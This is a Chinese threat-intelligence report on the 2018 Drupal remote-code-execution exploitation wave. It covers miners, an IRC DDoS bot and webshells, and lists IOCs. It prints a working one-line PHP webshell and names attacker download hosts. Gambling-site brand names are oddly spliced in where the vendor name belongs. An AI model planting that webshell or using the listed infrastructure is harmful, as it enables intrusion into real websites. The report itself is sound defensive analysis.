KMSpico激活工具木马分析
2017-09-30
Drupal远程代码执行漏洞威胁态势分析
一、概述
Drupal官方在2018年3月28日发布sa-core-2018-002 (CVE-2018-7600) Drupal内核远程代码执行漏洞预警,之后一个月内又连续发布两个漏洞,其中包含一个XSS和另一个高危代码执行漏洞sa-core-2018-004 (CVE-2018-7602),此后两个月内互联网上针对Drupal程序的攻击非常频繁,js1996官网登录威胁情报中心(NTI)结合安全情报数据,从漏洞披露到利用程序的传播,总结了外界针对Drupal程序的常见攻击手法,对相关态势进行了梳理,希望可以为安全从业人员提供建议和参考。
二、漏洞披露时间轴
虽然漏洞已经披露,相关利用的PoC却在两周后才放出,而仅仅在PoC披露后几个小时,就发现有利用此漏洞的攻击出现。在随后的时间内互联网上针对Drupal程序的攻击迅速增加,在4月29日达到峰值,并且针对该漏洞的攻击还在持续。
在PoC公布的时间轴上,扫描攻击中7.x版本的漏洞触发uri出现频率逐渐多于8.x版本,能看出攻击者的注意力逐渐从8.x版本转移到7.x版本。
下图统计了过去两个月间攻击ip在全球的分布情况,主要集中在北美洲、欧洲以及南美洲等区域,在国家层面上则是以墨西哥、厄瓜多尔、俄罗斯和美国为主要攻击源。
我们关注了发起攻击最频繁的几个ip,发现其中部分ip同时参与多种类型漏洞攻击,比如Weblogic反序列化漏洞(CVE-2017-10271), Struts2-s2045漏洞(CVE-2017-5638)等,除此之外也有相当数量的ip会对内网进行横向扩展实现蠕虫式传播,我们判断此类ip属于僵尸网络的一部分。
三、攻击与利用
根据我们的监控,漏洞公布后不久,网络中迅速出现了三类不同形式的攻击方式:
- 挖矿利用。攻击者利用漏洞在主机中植入数字货币的挖矿程序,利用主机资源进行挖矿运算。挖矿程序主要针对门罗币,并且同时存在Windows和Linux两个版本;
- 远控利用。该利用具有命令执行、下载远程文件、tcp/udp flood攻击等功能;
- Webshell植入。我们捕获的Webshell包括一句话木马,小马和功能强大的大马;
在这三类攻击方式中,挖矿利用的手法比较常见,而相关攻击指令和矿池地址也在其他RCE漏洞中出现过,可以判断黑产团伙也在密切关注此类高危漏洞。我们统计了这三类在所有攻击中的占比,其中向受害者主机植入挖矿脚本的占到95%,植入远控类样本占3%,植入网站后门的占1%,还有少部分部分是在目标网站挂上黑页。
挖矿类
在远程代码执行漏洞被披露后,黑产组织向漏洞主机植入挖矿程序,利用系统资源进行挖矿牟利,这类攻击往往走在最前面,而且黑产组织通常会同时发送基于Linux系统和Windows系统的攻击载荷,对不同平台达到相同的攻击目的。
- Windows平台
在Windows下攻击者会通过powershell写入vbs脚本并调用wscript下载恶意程序,或者直接通过powershell下载,样本运行后会释放出配置文件,并修改注册表实现自我保护
这条命令是从188.166.148.89下载5_DRUPAL并通过powershell执行
2.Linux平台
在linux平台下的攻击载荷则是多种多样,例如混合编码,伪装成jpg或者pdf文件等,攻击者会适配x86平台或x64平台,在受害者主机下载相应的挖矿程序,同时写入计划任务保持持久性,最终目的利用系统资源获取数字货币。
例如
wget下载shell脚本
payload经过八进制编码
这些样本的行为都是获取门罗币,而在整个漏洞利用过程中,门罗币组织判断有些钱包地址与僵尸网络有关,封停了部分钱包地址。
这期间我们发现了首例利用CVE-2018-7600漏洞蠕虫式传播的僵尸网络Muhstik,并且捕获了多个活跃样本,金沙js1996威胁情报中心(NTI)分析出该家族样本和C&C之间的关系。
NTI展示Muhstik家族关系
远控类
在漏洞爆发期间,我们监测到利用该漏洞传播的基于IRC协议的DDoS攻击远控脚本,脚本使用perl语言编写,注释中出现了葡萄牙语和西班牙语,我们分析了脚本的功能模块,发现一台C&C主机104.160.176.178,该脚本会根据指令进行命令执行、下载远程文件、tcp/udp flood等攻击
一些指令集
Webshell类
除了在受害者主机植入挖矿程序和远控程序外,远程下载webshell植入网站的也不在少数,而攻击事件表明越来越多的攻击者喜欢使用在线文件/文本分享平台存放webshell或bash脚本,隐藏真正的主机,达到隐匿踪迹的目的。
我们捕获了几类webshell如下,包含一句话木马,小马和功能强大的大马。
一句话木马:
if(isset($_REQUEST['c'])) {system( $_REQUEST['c'].'2>&1');}
我们统计两周内发送该一句话木马的攻击ip及出现次数如下:
IP |
出现次数 |
51.15.135.96 |
29 |
58.215.144.205 |
23 |
207.148.125.97 |
21 |
82.102.20.177 |
15 |
59.124.153.166 |
12 |
185.244.25.138 |
8 |
89.163.190.57 |
5 |
82.102.20.230 |
4 |
46.243.189.110 |
4 |
185.232.65.221 |
4 |
138.197.175.247 |
4 |
207.246.71.229 |
3 |
93.158.215.168 |
2 |
82.102.20.171 |
2 |
46.243.189.109 |
2 |
webshell/小马
webshell/大马
四、总结与建议
对此次Drupal内核远程代码执行漏洞事件的跟踪观察中,我们发现
- 从漏洞利用细节公布到有效攻击出现,时间窗口非常短暂,留给防御者的时间极其有限。此次事件中,这个时间窗口甚至已经缩短到小时级;
- 黑客普遍追求攻陷主机的数量。黑客在漏洞公布后短时间内,迅速开发相关利用工具,通过自动化的扫描与利用,在互联网上广泛地搜集缺陷主机,存在漏洞的网站普遍都存在着被攻陷的风险。因此管理员需要对网站出现的漏洞有足够的重视,第一时间进行升级和修补;
- 黑客具有较强的反追踪能力。黑客使用在线文件分享平台来隐匿自己的踪迹,例如pastebin等;
防护建议:
- 网站管理员应持续关注网站程序相关的漏洞情报,及时更新网站程序,升级防护设备规则;
- 管理员要关注网站主机系统资源利用情况,短时间内资源利用骤增且居高不下,需要关注是否被挖矿程序入侵,及时做好备份和清理恶意软件;
五、相关IOC
网络通信
142.44.240.14
145.239.93.215
188.166.148.89:444
217.182.231.56:443
195.22.127.225
104.160.176.178
文件服务器
http://94.41.167.11/
http://195.22.126.16/
http://188.166.148.89:53/
http://192.241.247.212/
http://93.174.93.149/
http://198.50.179.109:8020/
样本哈希
样本 |
备注 |
sha1 |
xm32.exe |
门罗币挖矿 |
cb00248b8bcd91e68c08a061a91cc3317db5724b |
Xm64.exe |
门罗币挖矿 |
8360f0d2df9008240f1d5e0f8acdbd2c98bad58c |
Xm32s |
门罗币挖矿 |
fcdd9c19b6b134dc31b3b688002eb51cac76a3ff |
xm64s |
门罗币挖矿 |
8822037953274ddd9f78b49ee73185be20e5e3ef |
1234567890.pdf |
门罗币挖矿 |
94c2ea3cf1cdb034df2e9aa5779fa0472396bff7 |
2sm.txt |
远控脚本 |
d7eb30269b3ba40ef59c0acef8948898fa54895f |
maxx2.txt |
远控脚本 |
68efd61193fc9b70394abb2327de2bf6b1f368b7 |
test.pl |
远控脚本 |
046a9c9838269fc5f76890b141bb39d22e6b9456 |
wow.txt |
远控脚本 |
c84dc265859d58827369eb25b752b6305b8306e7 |
K.txt |
php webshell |
7602c5cbc63e1bf2e484db63c94d5a22b7e17304 |
wso-encode.php |
php webshell |
e9e09b90cfdc1cd2ddb867385afa60816a7ee7d5 |
bash |
Muhstik家族 |
f92f1b03bcc45b692716789387d837905c8d4d76 |
shy |
Muhstik家族 |
0f4a3e0c6523fe0a0677f91182a1eabc536ff480 |
fbsd |
Muhstik家族 |
e6f914790b3888a46dff60f51a98c7191208685a |